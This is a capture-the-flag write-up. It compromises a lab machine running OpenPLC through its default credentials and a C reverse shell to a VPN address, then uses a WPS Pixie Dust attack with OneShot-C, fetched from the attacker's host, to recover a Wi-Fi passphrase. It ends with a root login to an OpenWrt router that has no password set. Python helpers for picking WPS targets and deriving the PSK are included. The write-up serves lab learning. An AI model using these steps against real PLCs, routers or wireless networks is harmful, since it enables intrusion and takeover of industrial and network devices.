User flag


The only interesting service is OpenPLC on port 8080 (http://10.129.175.20:8080/), and it still accepts the default credentials openplc:openplc.

To exploit this, navigate to the Hardware tab and append the following C reverse shell to the Hardware Layer Code box. Whatever is in that box gets compiled into the PLC runtime, so put in your own IP and port and have a listener on that port waiting when the PLC program starts:

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = 4711;                        // listener port on the attacking machine
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("10.10.14.158");   // attacking machine (VPN address)

    // Connect back, then point stdin/stdout/stderr of this process at the socket
    connect(sockt, (struct sockaddr *) &revsockaddr,
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    // Replace the process image with bash, now attached to the socket
    char * const argv[] = {"bash", NULL};
    execvp("bash", argv);
    return 0;
}

[screenshot: openplc]

Root flag


That was easy, but it has nothing to do with Wi-Fi, so there must be more to this box. The shell from the PLC runtime is already root, yet there is no root flag on this machine. This must be where the Wi-Fi part starts, so scan for networks from the box's wireless interface:

iw dev wlan0 scan

It finds a network named “plcrouter” with WPS enabled, one of the worst things you can turn on in a Wi-Fi router: the Pixie Dust attack recovers the WPS PIN offline from the weak nonces the AP uses in its WPS handshake, and once the PIN is known the AP hands over the WPA passphrase. This immediately brought Pixie Dust to mind. I had already exploited this vulnerability at work, so it was pretty straightforward for me.

[screenshot: iw output]
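To pick the WPS-enabled networks out of a scan without reading the whole dump by eye, here is an added example (my code, not part of the original writeup) that parses iw scan output and lists every BSS advertising WPS, together with its configured state. The scan output embedded below is constructed for the example, not captured from the box, and its BSSIDs are made up; the live_scan helper is the only part that touches real hardware.

```python
"""Added example: flag WPS-enabled networks in `iw dev wlan0 scan` output."""
import re
import subprocess

# Constructed sample of `iw dev wlan0 scan` output (not a capture from the box).
SAMPLE_SCAN = """\
BSS 02:00:00:00:01:00(on wlan0)
\tfreq: 2412
\tsignal: -30.00 dBm
\tSSID: plcrouter
\tRSN:\t * Version: 1
\t\t * Group cipher: CCMP
\t\t * Pairwise ciphers: CCMP
\t\t * Authentication suites: PSK
\tWPS:\t * Version: 1.0
\t\t * Wi-Fi Protected Setup State: 2 (Configured)
\t\t * Config methods: Label, Display
BSS 02:00:00:00:02:00(on wlan0)
\tfreq: 2437
\tsignal: -55.00 dBm
\tSSID: guestnet
\tRSN:\t * Version: 1
\t\t * Group cipher: CCMP
\t\t * Authentication suites: PSK
"""

BSS_RE = re.compile(r"^BSS ([0-9a-f:]{17})", re.I)


def parse_scan(text):
    """Split iw scan output into one dict per BSS: bssid, ssid, rsn, wps flag, WPS state."""
    networks = []
    cur = None
    for line in text.splitlines():
        m = BSS_RE.match(line)
        if m:  # a new "BSS <mac>(on <iface>)" header starts the next record
            cur = {"bssid": m.group(1), "ssid": "", "rsn": False,
                   "wps": False, "wps_state": None}
            networks.append(cur)
            continue
        if cur is None:
            continue
        s = line.strip()
        if s.startswith("SSID:"):
            cur["ssid"] = s[len("SSID:"):].strip()
        elif s.startswith("RSN:"):
            cur["rsn"] = True          # WPA2/WPA3 information element present
        elif s.startswith("WPS:"):
            cur["wps"] = True          # WPS information element present
        elif "Wi-Fi Protected Setup State:" in s:
            cur["wps_state"] = s.split("State:", 1)[1].strip()
    return networks


def wps_targets(text):
    """(bssid, ssid, state) for every BSS advertising WPS: the Pixie Dust candidates."""
    return [(n["bssid"], n["ssid"], n["wps_state"]) for n in parse_scan(text) if n["wps"]]


def live_scan(iface="wlan0"):
    """Run the real scan (needs root); kept apart so the parser is testable offline."""
    out = subprocess.run(["iw", "dev", iface, "scan"], capture_output=True,
                         text=True, check=True)
    return wps_targets(out.stdout)


if __name__ == "__main__":
    for bssid, ssid, state in wps_targets(SAMPLE_SCAN):
        print(f"{bssid}  {ssid!r}  WPS state: {state}")
```

On the sample this reports only plcrouter; guestnet carries an RSN element but no WPS element, so it is not a Pixie Dust candidate. A state of "2 (Configured)" means the AP already has credentials to hand out once the PIN is known.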

Get the C source from OneShot-C, move it to the machine, compile it and run it in Pixie Dust mode (-K). Like the original OneShot, it drives wpa_supplicant and pixiewps, so both have to be present on the target:

curl 10.10.14.143/wifi/OneShot-C/oneshot.c > oneshot.c   # served from the attacking machine
gcc oneshot.c -o oneshot
./oneshot -i wlan0 -K                                    # -K: Pixie Dust attack
# select the "plcrouter" network from the list

[screenshot: oneshot-c output]

# write a wpa_supplicant network block with the PSK derived from the recovered passphrase
wpa_passphrase plcrouter 'NoWWEDoKnowWhaTisReal123' > psk
wpa_supplicant -B -c psk -i wlan0

# assign an address on the router's subnet to the interface
ifconfig wlan0 192.168.1.5 netmask 255.255.255.0
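wpa_passphrase only does one thing: it stretches the passphrase with PBKDF2-HMAC-SHA1, using the SSID as salt and 4096 iterations, into the 256-bit PSK that wpa_supplicant actually uses in the 4-way handshake. As an added example (my code, not from the original writeup), the same derivation in Python, checked against the IEEE 802.11i test vector (“password” / “IEEE”); it is handy for sanity-checking a recovered passphrase or for writing the psk file on a box where wpa_passphrase is not installed:

```python
"""Added example: reproduce wpa_passphrase (WPA-PSK derivation and network block)."""
import hashlib


def wpa_psk(ssid, passphrase):
    """WPA/WPA2-Personal PSK = PBKDF2-HMAC-SHA1(passphrase, salt=ssid, 4096 iters, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8..63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32).hex()


def wpa_supplicant_block(ssid, passphrase):
    """Network block in the form wpa_passphrase writes (plaintext passphrase commented out)."""
    return (
        "network={\n"
        f"\tssid=\"{ssid}\"\n"
        f"\t#psk=\"{passphrase}\"\n"
        f"\tpsk={wpa_psk(ssid, passphrase)}\n"
        "}\n"
    )


if __name__ == "__main__":
    # IEEE 802.11i test vector: "password" / "IEEE"
    print(wpa_psk("IEEE", "password"))
    # the block the writeup feeds to wpa_supplicant -c psk
    print(wpa_supplicant_block("plcrouter", "NoWWEDoKnowWhaTisReal123"))
```

The test vector must come out as f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e; if it does not, the SSID or passphrase encoding is wrong, which is also the first thing to check when a freshly recovered passphrase refuses to associate.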

Try to SSH into the router as root. OpenWrt ships with an empty root password until one is set, and nobody set one here, so the login goes straight through (OpenWrt's default LAN address is 192.168.1.1, which is why wlan0 was given an address in that subnet).

[screenshot: openwrt console]